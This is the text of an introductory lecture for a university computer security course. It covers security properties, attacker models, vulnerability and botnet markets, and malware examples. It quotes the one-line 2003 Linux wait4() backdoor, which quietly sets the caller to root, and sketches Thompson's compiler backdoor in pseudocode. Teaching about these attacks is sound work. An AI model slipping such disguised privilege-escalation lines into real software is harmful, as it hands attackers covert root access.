CS 155

Spring 2013

Computer and Network Security

Dan Boneh and John Mitchell https://courseware.stanford.edu/pg/courses/CS155

Whats this course about?

Intro to computer and network security Some challenging fun projects

Learn about attacks Learn about preventing attacks Application and operating system security Web security Network security, Mobile app security
Not a course on cryptography (take CS255!)

Lectures on related topics

Organization

(subject to change)

Application and OS security (5 lectures)

Web security (4 lectures)

Buffer overflow project Vulnerabilities: control hijacking attacks, fuzzing Prevention: System design, robust coding, isolation Web site attack and defenses project Browser policies, session mgmt, user authentication HTTPS and web application security Network traceroute and packet filtering project Protocol designs, vulnerabilities, prevention Malware, botnets, DDoS, network security testing Cryptography (user perspective), digital rights management, final guest lecture,

Network security (6 lectures)

A few other topics

General course info

(see web)

Prerequisite: Operating systems (CS140) Textbook: none reading online Coursework

3 projects, 2 homeworks, final exam grade: 0.25 H + 0.5 P + 0.25 F

Teaching assistants Occasional optional section

Introduction to project assignments

SECURITY CONCEPTS

What is security?
System correctness

If user supplies expected input, system generates desired output If attacker supplies unexpected input, system does not fail in certain ways

Security

What is security?
System correctness

Good input Good output

Bad input Bad output

Security

What is security?
System correctness

More features: better

More features: can be worse

Security

Security properties
Confidentiality

Information about system or its users cannot be learned by an attacker The system continues to operate properly, only reaching states that would occur if there were no attacker
Actions by an attacker do not prevent users from having access to use of the system

Integrity

Availability

General picture

System

Alice

Attacker

Security is about

Honest user (e.g., Alice, Bob, ) Dishonest Attacker How the Attacker
Disrupts honest users use of the system (Integrity, Availability) Learns information intended for Alice only (Confidentiality)

Network security

Network Attacker System Intercepts and controls network communication

Alice

Web security

System

Web Attacker Sets up malicious site visited by victim; no control of network Alice

Operating system security

OS Attacker Controls malicious files and applications Alice

System

Alice

Attacker

Confidentiality: Attacker does not learn Alices secrets Integrity: Attacker does not undetectably corrupt systems function for Alice Availability: Attacker does not keep system from being useful to Alice

TRENDS AND STATISTICS

The computer security problem

Lots of buggy software
(and gullible users)

Money can be made from finding and exploiting vulnerabilities.

Marketplace for vulnerabilities Marketplace for owned machines (PPI) Many methods to profit from owned client machines

MITRE tracks vulnerability disclosures

Cumulative Disclosures
Percentage from Web applications

2010
Source: IBM X-Force, Mar 2011 Data: http://cve.mitre.org/

Reported Web Vulnerabilities "In the Wild"

Data from aggregator and validator of NVD-reported vulnerabilities

Web vs System vulnerabilities

XSS peak

Decline in % web vulns since 2009

49% in 2010 -> 37% in 2011. Big decline in SQL Injection vulnerabilities

Mobile Operating Systems

Mobile OS Vulnerabilities
Mobile OS Exploits

Source: IBM X-Force, Mar 2011

Phishing?

Bot networks
Continue to be major problem (e.g., Spam)

THE MARKETPLACE FOR VULNERABILITIES

Marketplace for Vulnerabilities

Option 1: bug bounty programs Google Vulnerability Reward Program: 3K $ Mozilla Bug Bounty program: 500$ Pwn2Own competition: 15K $ Option 2: ZDI, iDefense: 2K 25K $

Marketplace for Vulnerabilities

Option 3: black market

Source: Charlie Miller

(securityevaluators.com/files/papers/0daymarket.pdf)

Marketplace for owned machines

clients spam
bot keylogger

Pay-per-install (PPI) services

Own victims machine Download and install clients code Charge client
Cost: US 100-180$ / 1000 machines Asia 7-8$ / 1000 machines

PPI service

Victims
Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

ATTACKER GOALS, EXAMPLES

The computer security problem

Lots of buggy software
(and gullible users)

Money can be made from finding and exploiting vulnerabilities.

Marketplace for vulnerabilities Marketplace for owned machines (PPI) Many methods to profit from owned client machines

Why own machines: IP address and bandwidth stealing

Attackers goal: look like a random Internet user Use the infected machines IP address for:

Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase
1:260K greeting card spams leads to infection

Denial of Service:

Services: 1 hour (20$), 24 hours (100$)

Click fraud (e.g. Clickbot.a)

Why own machines: Steal user credentials

keylog for banking passwords, web passwords, gaming pwds Example: SilentBanker (2007)
User requests login page

Malware injects Javascript When user submits information, also sent to attacker

Bank sends login page needed to log in

Bank

Similar mechanism used by Zeus botnet

Why own machines: Spread to isolated systems

Example: Stuxtnet
Windows infection Siemens PCS 7 SCADA control software on Windows Siemens device controller on isolated network

More on this later in course

Drive-by Downloads

Web attack toolkit: MPack

Basic setup

Features

Toolkit hosted on web server Infects pages on that server Page visitors get infected
Customized: determines exploit on the fly, based on users OS, browser, etc Easy to use: management console provides stats on infection rates Customer care toolkit can be purchased with one-year support contract!

Insider attacks: example

Hidden trap door in Linux

(nov 2003)

Allows attacker to take over a computer Practically undetectable change (uncovered via CVS
logs)

Inserted line in wait4()

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

Looks like a standard error check, but

See: http://lwn.net/Articles/57135/

WHAT CAN YOU TRUST?

Ken Thompson
What code can we trust?

Consider "login" or "su" in Unix Is RedHat binary reliable? Does it send your passwd to someone?
Read source code or write your own Does this solve problem?

Can't trust binary so check source, recompile

Reflections on Trusting Trust, http://www.acm.org/classics/sep95/

Compiler backdoor
This is the basis of Thompson's attack

Compiler looks for source code that looks like login program If found, insert login backdoor (allow special user to log in)
Inspect the compiler source

How do we solve this?

C compiler is written in C
Change compiler source S
compiler(S) { if (match(S, "login-pattern")) { compile (login-backdoor) return } if (match(S, "compiler-pattern")) { compile (compiler-backdoor) return } .... /* compile as usual */ }

Clever trick to avoid detection

Compile this compiler and delete backdoor tests from source

Someone can compile standard compiler source to get new compiler, then compile login, and get login with backdoor

Simplest approach will only work once

Compiling the compiler twice might lose the backdoor But can making code for compiler backdoor output itself
(Can you write a program that prints itself? Recursion thm)

Read Thompson's article

Short, but requires thought

CONCLUDING

Ethical use of security information

We discuss vulnerabilities and attacks

Most vulnerabilities have been fixed Some attacks may still cause harm Do not try these at home or anyplace else
Learn to prevent malicious attacks Use knowledge for good purposes

Purpose of this class

If you remember only one thing from this course:

A vulnerability that is too complicated for anyone to ever find will be found and exploited !

We hope you remember more than one thing